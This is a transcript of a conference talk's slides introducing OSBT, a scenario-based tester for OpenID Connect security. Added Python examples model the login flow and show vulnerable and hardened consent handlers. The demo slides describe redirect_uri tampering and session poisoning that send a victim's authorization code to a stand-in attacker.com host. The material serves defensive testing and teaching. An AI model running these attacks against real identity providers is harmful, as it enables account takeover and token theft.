Slide 1

OSBT: OpenID Connect Scenario-Based Tester
Junki Yuasa
Nara Institute of Science and Technology, Laboratory for Cyber Resilience
2023/11/08, CODE BLUE 2023 BlueBox Edition

Slide 2

Who am I?
Junki Yuasa (湯浅 潤樹)
- Nara Institute of Science and Technology
- Student (M2)
- Research on ID federation security
  - OAuth, OpenID Connect
- SECCON Beginners CTF writer
X: @melonattacker

Slide 3

Spread of social login
Social login reduces the burden of account management.

Diagram: with normal login, the user keeps a separate credential for each of Web app A, Web app B and Web app C, so the burden increases; with social login, one credential covers Web app A, B and C, so the burden decreases.

Slide 4

OpenID Connect (OIDC)
OIDC is a protocol for social login.
- User authentication is left to an external service (the IdP)
- The ID Token is a token containing user attribute information

Diagram: User, Relying Party (RP), ID Provider (IdP); 1. Authentication (User with the IdP), 2. ID Token (IdP to RP).

Slide 5

OpenID Connect (OIDC)
OIDC is based on the OAuth 2.0 authorization protocol.
- It can also issue tokens that allow access to user resources
- Access Token: a token that allows access to user resources

Diagram: User, Relying Party (RP), ID Provider (IdP).

Slide 6

OIDC Flow (Authorization code flow)
Diagram: sequence between User, RP and IdP; the authentication starts.

Slide 7

OIDC Flow (Authorization code flow)
Authentication Request (the RP redirects the User to the IdP):

GET /authorize
  ?response_type=code
  &scope=openid profile email
  &client_id=dkn9nE9…MPuifABrH
  &state=af0ifjsldkj
  &redirect_uri=https://rp.example.com/cb

Slide 8

OIDC Flow (Authorization code flow)
Same Authentication Request as slide 7; annotation: redirect_uri is the URL the IdP will redirect back to.

Slide 9

OIDC Flow (Authorization code flow)
The User submits credentials and consent to the IdP.

Slide 10

OIDC Flow (Authorization code flow)
The IdP returns the authorization code by redirecting the User back to the RP:

302 Found
Location: https://rp.example.com/cb
  ?code=SplxlOBeZQQYbYS6WxSbIA
  &state=af0ifjsldkj

Slide 11

OIDC Flow (Authorization code flow)
Same redirect as slide 10; annotation: the Location header holds the URL to redirect to.

Slide 12

OIDC Flow (Authorization code flow)
Same redirect as slide 10; annotation: the code parameter is the authorization code.

Slide 13

OIDC Flow (Authorization code flow)
Token request (RP to IdP):

POST /token
Host: idp.example.com
Content-Type: application/x-www-form-urlencoded
Authorization: Basic czZCaGRSa3…mQmF0M2JW

grant_type=authorization_code
&code=SplxlOBeZQQYbYS6WxSbIA
&redirect_uri=https://rp.example.com/cb

Slide 14

OIDC Flow (Authorization code flow)
Same token request as slide 13; annotation: the code parameter carries the authorization code received in the redirect.

Slide 15

OIDC Flow (Authorization code flow)
Same token request as slide 13; annotation: redirect_uri, the URL to redirect to, is sent again in the token request.

Slide 16

OIDC Flow (Authorization code flow)
Token response (IdP to RP):

{
  "access_token": "SlAV32hkKG",
  "token_type": "Bearer",
  "refresh_token": "8xLOxBtZp8",
  "expires_in": 3600,
  "id_token": "eyJhb…KMzqg"
}

Slide 17

OIDC Flow (Authorization code flow)
Same token response as slide 16; annotation: the Access Token is used by the RP to acquire user resources.

Slide 18

OIDC Flow (Authorization code flow)
Same token response as slide 16; annotation: the ID Token is used for user authentication in the RP.
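As an added worked example (not code from the slides and not OSBT's code), the following Python models the authorization code flow of slides 6-18 with both sides as in-memory functions. The RP builds the authentication request with a fresh state and nonce; the toy IdP checks redirect_uri against its client registry, issues a single-use code bound to client_id and redirect_uri, and answers the token request with an HS256-signed ID token; the RP then matches state, redeems the code and verifies the ID token's signature, iss, aud, exp and nonce. All names, secrets and URLs are assumed, and the nonce parameter and HS256 signing are standard OIDC but are not shown on the slides.

```python
import base64, hashlib, hmac, json, secrets, time
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed configuration (assumed values, not from the slides).
ISSUER = "https://idp.example.com"
CLIENT_ID = "rp-client-id"
CLIENT_SECRET = "rp-client-secret"
REDIRECT_URI = "https://rp.example.com/cb"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()

# ---------------- toy IdP (in-memory stand-in for idp.example.com) ----------------
IDP_CLIENTS = {CLIENT_ID: {"secret": CLIENT_SECRET, "redirect_uris": {REDIRECT_URI}}}
IDP_CODES = {}  # code -> what it was issued for; every code is single use

def idp_authorize(query: dict, authenticated_sub: str) -> str:
    """Slides 7-12: authentication request, credentials/consent, 302 back to the RP."""
    client = IDP_CLIENTS.get(query.get("client_id"))
    # redirect_uri must exactly match a value registered for this client_id
    if client is None or query.get("redirect_uri") not in client["redirect_uris"]:
        raise ValueError("invalid client_id or redirect_uri")
    if query.get("response_type") != "code" or "openid" not in query.get("scope", "").split():
        raise ValueError("not an OIDC authorization code request")
    code = secrets.token_urlsafe(16)
    IDP_CODES[code] = {"client_id": query["client_id"], "redirect_uri": query["redirect_uri"],
                       "nonce": query.get("nonce"), "sub": authenticated_sub, "used": False}
    # Location of the 302 Found: the code plus the RP's own state value
    return query["redirect_uri"] + "?" + urlencode({"code": code, "state": query["state"]})

def idp_token(form: dict, basic_auth: tuple) -> dict:
    """Slides 13-16: token request with client authentication, then the token response."""
    client_id, client_secret = basic_auth
    client = IDP_CLIENTS.get(client_id)
    if client is None or not hmac.compare_digest(client["secret"], client_secret):
        raise ValueError("invalid_client")
    rec = IDP_CODES.get(form.get("code"))
    # The code is bound to the client and redirect_uri it was issued for, and used once
    if (form.get("grant_type") != "authorization_code" or rec is None or rec["used"]
            or rec["client_id"] != client_id or rec["redirect_uri"] != form.get("redirect_uri")):
        raise ValueError("invalid_grant")
    rec["used"] = True
    now = int(time.time())
    claims = {"iss": ISSUER, "sub": rec["sub"], "aud": client_id, "iat": now, "exp": now + 600}
    if rec["nonce"]:
        claims["nonce"] = rec["nonce"]
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signature = hs256(f"{header}.{payload}".encode(), client["secret"])
    return {"access_token": secrets.token_urlsafe(8), "token_type": "Bearer",
            "expires_in": 3600, "id_token": f"{header}.{payload}.{b64url(signature)}"}

# ---------------- RP ----------------
RP_PENDING = {}  # state -> nonce, for logins this RP started and has not finished

def rp_start_login() -> str:
    """Build the authentication request URL; state and nonce are fresh per login."""
    state, nonce = secrets.token_urlsafe(16), secrets.token_urlsafe(16)
    RP_PENDING[state] = nonce
    return ISSUER + "/authorize?" + urlencode({
        "response_type": "code", "scope": "openid profile email", "client_id": CLIENT_ID,
        "state": state, "nonce": nonce, "redirect_uri": REDIRECT_URI})

def rp_verify_id_token(id_token: str, expected_nonce: str) -> dict:
    """Check the signature and the claims the RP relies on before trusting the login."""
    header, payload, sig = id_token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("unexpected alg")  # never let the token choose the algorithm
    expected = hs256(f"{header}.{payload}".encode(), CLIENT_SECRET)
    if not hmac.compare_digest(b64url_decode(sig), expected):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload))
    if (claims.get("iss") != ISSUER or claims.get("aud") != CLIENT_ID
            or claims.get("exp", 0) < time.time() or claims.get("nonce") != expected_nonce):
        raise ValueError("ID token claim check failed")
    return claims

def rp_handle_callback(callback_url: str) -> dict:
    """The RP's redirect_uri endpoint: match state, redeem the code, verify the ID token."""
    q = {k: v[0] for k, v in parse_qs(urlparse(callback_url).query).items()}
    nonce = RP_PENDING.pop(q.get("state"), None)
    if nonce is None:
        raise ValueError("unknown state: not a login this RP started")
    tokens = idp_token({"grant_type": "authorization_code", "code": q.get("code"),
                        "redirect_uri": REDIRECT_URI}, (CLIENT_ID, CLIENT_SECRET))
    return rp_verify_id_token(tokens["id_token"], nonce)

def run_flow(sub: str = "alice") -> dict:
    """Drive one complete login and return the verified ID token claims."""
    auth_url = rp_start_login()
    auth_query = {k: v[0] for k, v in parse_qs(urlparse(auth_url).query).items()}
    callback = idp_authorize(auth_query, sub)  # the user authenticated and consented
    return rp_handle_callback(callback)
```

Each check sits where the slides place the corresponding message: the redirect_uri check at /authorize, the code-to-client binding and single use at /token, and the state and ID token checks at the RP's callback. Removing any one of them is a scenario a tester can write against a real RP or IdP.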

Slide 19

Vulnerability testing challenges for OIDC
- Multiple entities interact
- Potential vulnerabilities exist throughout the auth flow
- Checking behavior during the auth flow operations is essential
- Customizing scenarios flexibly is essential to address various vulnerabilities

Diagram: User, RP and IdP, with potential vulnerabilities marked at each entity and on the messages between them.

Slide 21

Vulnerability testing challenges for OIDC
- Multiple entities interact
- Potential vulnerabilities exist throughout the auth flow
- Checking behavior during the auth flow operations is essential
- Customizing scenarios flexibly is essential to address various vulnerabilities

Research objective: create a test tool that allows for highly customizable scenarios.

Slide 22

Test Issue 1: Test coverage
A tool should be able to address both specification-based vulns and implementation-based vulns.
- Specification-based vulnerability
  - Resulting from improper implementation of the specification
  - Indicated in the specification's Security Considerations
- Implementation-based vulnerability
  - Resulting from implementation outside of the specification
  - Vulnerabilities registered as CVEs, etc.

Slide 23

Implementation-based vulnerability
Resulting from implementation outside of the specification.
- Vulnerabilities due to the implementation method
  - Resulting from implementation methods such as unique protocol extensions and session management
- Vulnerabilities due to using a server/database
  - Resulting from improper use of the server, database, etc.
- Vulnerabilities due to using a language/framework
  - Resulting from improper use of the language and framework
- Vulnerabilities due to chained exploitation of RP/IdP
  - Resulting from a situation where chained exploitation of the RP and IdP is possible

Slide 24

Implementation-based vulnerability (examples)
Resulting from implementation outside of the specification.
- Vulnerabilities due to the implementation method
  - Session poisoning resulting from improper session management
- Vulnerabilities due to using a server/database
  - LDAP injection resulting from improper handling of LDAP queries
- Vulnerabilities due to using a language/framework
  - Incomplete redirect_uri validation resulting from improper use of Auto Binding
- Vulnerabilities due to chained exploitation of RP/IdP
  - Theft of a valid authorization code by exploiting an XSS in the RP together with authorization code consumption flaws in the IdP

Slide 25

Test Issue 2: Customizability of scenarios
Whether the requirements for customizability are met. This customizability is required for detecting implementation-based vulns.
- Requirement 1: Fixed scenario (Operation A, Operation B, Operation C)
- Requirement 2: Operations can be disabled (e.g., Operation B skipped)
- Requirement 3: The order of operations can be changed (e.g., Operation B, Operation A, Operation C)
- Requirement 4: Variables within operations can be specified (Variable A inside an operation)

Slide 26

Test Issue 3: Reproducibility
Manual testing is useful but difficult to reproduce.
- Simulate both victim and attacker operations (Victim: OP 1, OP 2, OP 3; Attacker: OP 1, OP 2, OP 3)
- Manipulate multiple parameters in multiple requests

Slide 27

Existing test tools and manual verification
The three issues are not adequately resolved.

Tool            | Test coverage                          | Customizability of scenarios | Reproducibility
SSOScan [1]     | △ Only spec-based vulns (5)            | △ Requirement 1              | ◯ Automation
PrOfESSOS [2]   | △ Only spec-based vulns (11)           | △ Requirements 1, 2          | ◯ Automation
Manual testing  | ◯ Spec-based vulns, impl-based vulns   | ◯ Requirements 1, 2, 3, 4    | △ Manual

[1] Zhou, Yuchen, and David Evans. "SSOScan: Automated testing of web applications for Single Sign-On vulnerabilities." 23rd USENIX Security Symposium (USENIX Security 14). 2014.
[2] Mainka, Christian, et al. "SoK: single sign-on security—an evaluation of OpenID Connect." 2017 IEEE European Symposium on Security and Privacy (EuroS&P). IEEE, 2017.

Slide 28

OSBT: OpenID Connect Scenario-Based Tester
A tool that allows you to programmatically write and execute test scenarios.

Tool      | Test coverage                                    | Customizability of scenarios | Reproducibility
OSBT [3]  | ◯ Spec-based vulns, implementation-based vulns   | ◯ Requirements 1, 2, 3, 4    | ◯ Automation

[3] OSBT, https://github.com/oidc-scenario-based-tester/osbt

Slide 29

OSBT: Test coverage, customizability of scenarios
Implementation-based vulnerabilities can also be tested.
- Existing tools: the test scenarios (Scenario 1, Scenario 2, Scenario 3) are built into the tool, so implementation-based vulns cannot be tested
- OSBT: customizable scenarios can be created with the scenario description function (New Scenario), so implementation-based vulns can be tested

Slide 30

OSBT: Reproducibility
OSBT reproduces operations equivalent to manual testing.
- Manual testing: the procedure is complicated, so reproducibility is difficult to ensure
- OSBT: the procedure is written in code, so reproducibility is ensured

Slide 31

Test scenario description function
Developed based on the scenario description requirements.
- Browser operation function
  - Operations on the screen, expanding URLs, and acquiring page sources
- HTTP request/response manipulation function
  - Data tampering, sending multiple parameters, interception, obtaining history
- Attacker IdP operation function
  - Specifying returned ID tokens, IdP information, etc.
- Attacker server operation function
  - Referring to logs to check the possibility of stealing authorization codes or tokens

Slide 32

Test scenario description function: Browser operation
- Expanding URLs (e.g., a malicious URL): addresses vulnerabilities that require phishing
- Operation on the screen: automates browser operations during the auth flow
- Acquiring page sources: used to judge test results

Diagram: User, RP, IdP and Attacker.

Slide 33

Test scenario description function: HTTP request/response manipulation
A proxy server run by the tester sits between the User and the RP/IdP.
- Data tampering, sending multiple params: addresses vulnerabilities due to inadequate parameter validation
- Interception: used to interrupt the authentication flow
- Obtaining history: used to judge test results

Slide 34

Test scenario description function: Attacker IdP operation
- Specifying IdP information: addresses vulnerabilities due to inadequate validation of IdP information
- Specifying tokens: addresses vulnerabilities due to inadequate token validation

Diagram: User, RP and Attacker IdP.

Slide 35

Test scenario description function: Attacker server operation
- Referring to logs: checking the possibility of stealing authorization codes or tokens (a code or token that reaches the attacker server shows up in its logs)

Diagram: User, RP, IdP and Attacker server.

Slide 36

Architecture
Diagram: the Tester (scenario) drives the Attacker server, the Attacker IdP and a Proxy server; the RP and IdP are the test target and are reached through the proxy.

Slide 37

The flow of scenario execution
A scenario to test for flaws in redirect_uri validation:
1. Setup
2. Send commands to tamper with the redirect_uri
3. Execute the authentication flow
4. Refer to the attacker server's log

Slide 38

The flow of scenario execution
Data tampering: the Tester (scenario) instructs the Proxy server to change the value of redirect_uri to the attacker server's URL on its way to the test target (RP, IdP).

Slide 39

The flow of scenario execution
Operation on the screen: the Tester (scenario) enters credentials during the execution of the authentication flow.

Slide 40

The flow of scenario execution
Referring to logs: the Tester (scenario) reads the Attacker server's log to check whether the authorization code could be stolen.
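As an added example of the "referring to logs" judgement step at the end of the scenario on slides 37-40 (this is not OSBT's own code, and OSBT's log format and API are not assumed here), the Python below parses an attacker server's access log and reports any request that carried an authorization code or token in its query string. The log lines are constructed for this example in Common Log Format; the code value reuses the sample value from the slides.

```python
import re
from urllib.parse import parse_qs, urlparse

# Query parameters whose arrival at the attacker server means the scenario found a leak.
SENSITIVE = ("code", "access_token", "id_token", "refresh_token")

# Common Log Format: host ident user [timestamp] "METHOD target HTTP/x" status size
LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log of the attacker server after one scenario run.
# Only the second line is a leak: the third carries an error, not a code.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Nov/2023:10:00:01 +0900] "GET /healthz HTTP/1.1" 200 12
203.0.113.5 - - [08/Nov/2023:10:00:07 +0900] "GET /cb?code=SplxlOBeZQQYbYS6WxSbIA&state=af0ifjsldkj HTTP/1.1" 200 0
203.0.113.5 - - [08/Nov/2023:10:00:09 +0900] "GET /cb?error=access_denied&state=af0ifjsldkj HTTP/1.1" 200 0
"""

def parse_log(text: str) -> list:
    """Parse each log line into a dict; lines that do not match are skipped, not fatal."""
    entries = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries

def leaked_credentials(entries: list) -> list:
    """Return (timestamp, path, {param: value}) for every request carrying a code or token.

    Only the query string is inspected: a browser never sends the URL fragment to the
    server, so tokens delivered in a fragment (implicit flow) do not appear in any server
    log and have to be judged from the page source instead (slide 32)."""
    findings = []
    for e in entries:
        url = urlparse(e["target"])
        found = {k: v[0] for k, v in parse_qs(url.query).items() if k in SENSITIVE}
        if found:
            findings.append((e["ts"], url.path, found))
    return findings

def judge(log_text: str) -> dict:
    """Scenario verdict: 'vulnerable' if any code or token reached the attacker server."""
    findings = leaked_credentials(parse_log(log_text))
    return {"verdict": "vulnerable" if findings else "not detected", "findings": findings}

if __name__ == "__main__":
    print(judge(SAMPLE_LOG))
```

The verdict is deliberately binary and keyed on parameter names rather than on the code's value, so the same judgement function serves the redirect_uri tampering scenario, the Auto Binding demo and the session poisoning demo without per-scenario changes.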

Slide 41

Implementation (OSBT [3])
Diagram: the same architecture (Tester (scenario), Attacker server, Attacker IdP, Proxy server, with the RP and IdP as test target), used to find vulns.
[3] OSBT, https://github.com/oidc-scenario-based-tester/osbt

Slide 42

DEMO: redirect_uri bypass via Auto Binding
The IdP validates redirect_uri (the URL to redirect to) on the Authentication Request:

GET /authorize
  ?response_type=code
  &scope=openid profile email
  &client_id=dkn9nE9…MPuifABrH
  &state=af0ifjsldkj
  &redirect_uri=https://rp.example.com/cb

Slide 43

DEMO: redirect_uri bypass via Auto Binding
The User submits credentials and consent. The query params are inherited into the consent request via Auto Binding, and the IdP does not validate redirect_uri again here:

GET /consent
  ?response_type=code
  &scope=openid profile email
  &client_id=dkn9nE9…MPuifABrH
  &state=af0ifjsldkj
  &redirect_uri=https://rp.example.com/cb

Slide 44

DEMO: redirect_uri bypass via Auto Binding (attack steps)
Entities: User, Relying Party (RP), ID Provider (IdP), Attacker.
1. The Attacker sends the User a phishing URL
2. Consent: GET /consent … &redirect_uri=https://attacker.com
3. The IdP redirects to redirect_uri: https://attacker.com?code=Splxl…xSbIA
Authorization code leaked!

Slide 45

DEMO: redirect_uri session poisoning
Authentication Request; the IdP ties the params to the user's session, identified by the session cookie:

GET /authorize
  ?response_type=code
  &scope=openid profile email
  &client_id=dkn9nE9…MPuifABrH
  &state=af0ifjsldkj
  &redirect_uri=https://rp.example.com/cb
Cookie: session=kAKJnsier7EAR8jsK

Slide 46

DEMO: redirect_uri session poisoning
A second Authentication Request sent at the same time with the same session cookie; the parameters tied to the session are updated:

GET /authorize
  ?response_type=code
  &scope=openid profile email
  &client_id=attacker_client_id
  &state=af0ifjsldkj
  &redirect_uri=https://attacker.com
Cookie: session=kAKJnsier7EAR8jsK

Slide 47

DEMO: redirect_uri session poisoning (attack steps)
Entities: User, Relying Party (RP), ID Provider (IdP), Attacker.
1. The Attacker sends the User a phishing URL
2. The User opens the web site
3. Authentication request: GET /authorize, Cookie: session=kA..sK, … &client_id=honest &redirect_uri=https://rp.example.com

Slide 48

DEMO: redirect_uri session poisoning (attack steps)
Entities: User, Relying Party (RP), ID Provider (IdP), Attacker.
1. The Attacker sends the User a phishing URL
2. The User opens the web site
4. Authentication request: GET /authorize, Cookie: session=kA..sK, … &client_id=attacker &redirect_uri=https://attacker.com

Slide 49

DEMO: redirect_uri session poisoning (attack steps)
Entities: User, Relying Party (RP), ID Provider (IdP), Attacker.
1. The Attacker sends the User a phishing URL
2. The User opens the web site
5. Consent: POST /consent, Cookie: session=kA..sK, … consent="Yes"
6. The IdP redirects to redirect_uri: https://attacker.com?code=Splxl…xSbIA
Authorization code leaked!
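As an added example for both demos (slides 42-44 and 45-49), written from the IdP implementer's side and not taken from the slides, from OSBT or from any real IdP, the Python below models the two consent-handling defects on a toy IdP and places a hardened design beside them. In the Auto Binding variant the consent handler re-reads redirect_uri from the request, so a consent URL with a changed value is honoured; in the session variant the parameters live in a single per-session slot that a later /authorize on the same cookie overwrites; the hardened variant binds the validated parameters to a single-use transaction id that the consent form echoes back, so neither the query string nor a second request on the same session can change where the code goes. Client names, hosts and the form field names are assumed.

```python
import secrets
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed client registry. The attacker can register a client of their own,
# so the "redirect_uri is registered for client_id" check alone passes the poisoning request.
CLIENTS = {
    "honest": {"redirect_uris": {"https://rp.example.com/cb"}},
    "attacker": {"redirect_uris": {"https://attacker.example/cb"}},
}

def validate_request(query: dict) -> dict:
    """The check every variant performs on /authorize: redirect_uri registered for client_id."""
    client = CLIENTS.get(query.get("client_id"))
    if client is None or query.get("redirect_uri") not in client["redirect_uris"]:
        raise ValueError("invalid client_id or redirect_uri")
    return {k: query[k] for k in ("client_id", "redirect_uri", "state")}

def issue_code(params: dict) -> str:
    """Location of the 302 after consent: code and state appended to redirect_uri."""
    return params["redirect_uri"] + "?" + urlencode({"code": secrets.token_urlsafe(8),
                                                      "state": params["state"]})

# --- Defect 1 (slides 42-44): query params inherited into /consent via Auto Binding ---
def authorize_autobind(session: dict, query: dict) -> str:
    validate_request(query)                 # validated on /authorize ...
    return "/consent?" + urlencode(query)   # ... then carried along in the consent URL

def consent_autobind(session: dict, query: dict) -> str:
    # The framework binds the request's query params straight into the handler's model
    # and the handler trusts them; redirect_uri is not validated a second time.
    return issue_code({k: query[k] for k in ("client_id", "redirect_uri", "state")})

# --- Defect 2 (slides 45-49): params tied to the session cookie, one slot per session ---
def authorize_session(session: dict, query: dict) -> str:
    session["pending"] = validate_request(query)  # a later /authorize overwrites this slot
    return "/consent"

def consent_session(session: dict, form: dict) -> str:
    if form.get("consent") != "Yes":
        raise ValueError("consent denied")
    return issue_code(session["pending"])   # whatever the slot holds right now

# --- Hardened: params bound to a single-use transaction id echoed by the consent form ---
def authorize_hardened(session: dict, query: dict) -> str:
    txn = secrets.token_urlsafe(16)
    session.setdefault("txns", {})[txn] = validate_request(query)  # one record per request
    return "/consent?" + urlencode({"txn": txn})   # only the opaque id travels in the URL

def consent_hardened(session: dict, form: dict) -> str:
    if form.get("consent") != "Yes":
        raise ValueError("consent denied")
    params = session.get("txns", {}).pop(form.get("txn"), None)   # single use
    if params is None:
        raise ValueError("unknown or already used transaction")
    return issue_code(params)   # redirect_uri comes only from the validated record

def code_destination(redirect_url: str) -> str:
    """Host that receives the code, i.e. what the attacker server's log would show."""
    return urlparse(redirect_url).hostname

# Constructed requests: the honest RP's request and the attacker's poisoning request.
HONEST = {"response_type": "code", "scope": "openid", "client_id": "honest",
          "state": "af0ifjsldkj", "redirect_uri": "https://rp.example.com/cb"}
POISON = dict(HONEST, client_id="attacker", redirect_uri="https://attacker.example/cb")

def run_scenarios() -> dict:
    """Where the code ends up under each variant; 'attacker.example' means it leaked."""
    out = {}
    s = {}
    authorize_autobind(s, HONEST)
    # Defect 1: the consent request's query carries a different redirect_uri
    tampered = dict(HONEST, redirect_uri="https://attacker.example/cb")
    out["autobind"] = code_destination(consent_autobind(s, tampered))
    s = {}
    authorize_session(s, HONEST)
    authorize_session(s, POISON)            # Defect 2: second request on the same session
    out["session"] = code_destination(consent_session(s, {"consent": "Yes"}))
    s = {}
    txn = parse_qs(urlparse(authorize_hardened(s, HONEST)).query)["txn"][0]
    authorize_hardened(s, POISON)           # gets its own record; the honest txn is untouched
    form = {"consent": "Yes", "txn": txn, "redirect_uri": "https://attacker.example/cb"}
    out["hardened"] = code_destination(consent_hardened(s, form))  # extra field is ignored
    try:
        consent_hardened(s, {"consent": "Yes", "txn": txn})        # replay of a used txn
        out["replay_rejected"] = False
    except ValueError:
        out["replay_rejected"] = True
    return out
```

The hardened design is the one an OSBT scenario for these two demos would be expected to pass: the proxy can tamper with the consent request and the scenario can send a second /authorize on the same session, but the attacker server's log stays empty.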

Slide 50

DEMO: GitHub Actions (CI)
- The tests run on GitHub Actions
- The test report is created as an issue

Slide 51

Summary
- Challenge
  - Existing test tools lack scenario customizability
  - They are unable to detect implementation-based vulnerabilities
- Research objective
  - Create a test tool that allows for highly customizable scenarios
- OSBT
  - Enables the execution of scenarios created with the scenario description function
- DEMO
  - Detects two implementation-based vulnerabilities
  - Available in GitHub Actions (CI)

Slide 52

References
[1] Zhou, Yuchen, and David Evans. "SSOScan: Automated testing of web applications for Single Sign-On vulnerabilities." 23rd USENIX Security Symposium (USENIX Security 14). 2014.
[2] Mainka, Christian, et al. "SoK: single sign-on security—an evaluation of OpenID Connect." 2017 IEEE European Symposium on Security and Privacy (EuroS&P). IEEE, 2017.
[3] OSBT, https://github.com/oidc-scenario-based-tester/osbt
Image: https://flaticon.com/